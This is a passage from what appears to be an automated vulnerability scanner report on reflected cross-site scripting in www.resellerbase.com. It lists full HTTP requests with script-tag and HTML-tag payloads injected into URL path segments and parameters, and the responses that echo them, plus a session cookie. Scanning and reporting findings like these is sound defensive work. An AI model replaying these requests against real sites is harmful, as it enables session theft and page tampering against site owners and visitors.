Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks26214<script>alert(1)</script>a1bcf784213/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4007. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c940b<script>alert(1)</script>cf3840767a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesc940b<script>alert(1)</script>cf3840767a5/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesc940b<script>alert(1)</script>cf3840767a5/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4008. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c094a<script>alert(1)</script>fd13b75a08a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmosc094a<script>alert(1)</script>fd13b75a08a/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmosc094a<script>alert(1)</script>fd13b75a08a/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4009. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload db2e5<script>alert(1)</script>ca94d9cc0fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/imagesdb2e5<script>alert(1)</script>ca94d9cc0fe/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/imagesdb2e5<script>alert(1)</script>ca94d9cc0fe/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4010. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d16ec<script>alert(1)</script>d57fa2b3c5f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/ratingd16ec<script>alert(1)</script>d57fa2b3c5f/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:54:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/ratingd16ec<script>alert(1)</script>d57fa2b3c5f/4half.gif was not found on this server.</p>
...[SNIP]...

2.4011. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7057a<script>alert(1)</script>93b295f1ece was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/4half.gif7057a<script>alert(1)</script>93b295f1ece HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:54:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/4half.gif7057a<script>alert(1)</script>93b295f1ece was not found on this server.</p>
...[SNIP]...

2.4012. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f140<script>alert(1)</script>89356ad7cdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/4half.gif?7f140<script>alert(1)</script>89356ad7cdc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/4half.gif?7f140<script>alert(1)</script>89356ad7cdc=1 was not found on this server.</p>
...[SNIP]...

2.4013. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1808<script>alert(1)</script>c1888063f0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationb1808<script>alert(1)</script>c1888063f0a/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationb1808<script>alert(1)</script>c1888063f0a/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4014. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0e41<script>alert(1)</script>d9fd59a983 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksa0e41<script>alert(1)</script>d9fd59a983/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksa0e41<script>alert(1)</script>d9fd59a983/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4015. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a8f01<script>alert(1)</script>a493ecdd58b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesa8f01<script>alert(1)</script>a493ecdd58b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesa8f01<script>alert(1)</script>a493ecdd58b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4016. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d0471<script>alert(1)</script>3d0669e0de5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmosd0471<script>alert(1)</script>3d0669e0de5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmosd0471<script>alert(1)</script>3d0669e0de5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4017. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 520b9<script>alert(1)</script>5d2993d278a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images520b9<script>alert(1)</script>5d2993d278a/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images520b9<script>alert(1)</script>5d2993d278a/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4018. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a159c<script>alert(1)</script>3bae12882b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/ratinga159c<script>alert(1)</script>3bae12882b8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/ratinga159c<script>alert(1)</script>3bae12882b8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4019. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7954f<script>alert(1)</script>2165647ab22 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php7954f<script>alert(1)</script>2165647ab22?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php7954f<script>alert(1)</script>2165647ab22?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4020. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9d63e<a>4e65cd53ad5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search9d63e<a>4e65cd53ad5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search9d63e<a>4e65cd53ad5&opt=2 was not found on this server.</p>
...[SNIP]...

2.4021. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ac593<a>f0748f13680 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...ac593<a>f0748f13680&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...ac593<a>f0748f13680&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4022. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63679<script>alert(1)</script>ba775e69840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&63679<script>alert(1)</script>ba775e69840=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&63679<script>alert(1)</script>ba775e69840=1 was not found on this server.</p>
...[SNIP]...

2.4023. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6be11<a>006b8eb45ba was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=26be11<a>006b8eb45ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=26be11<a>006b8eb45ba was not found on this server.</p>
...[SNIP]...

2.4024. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
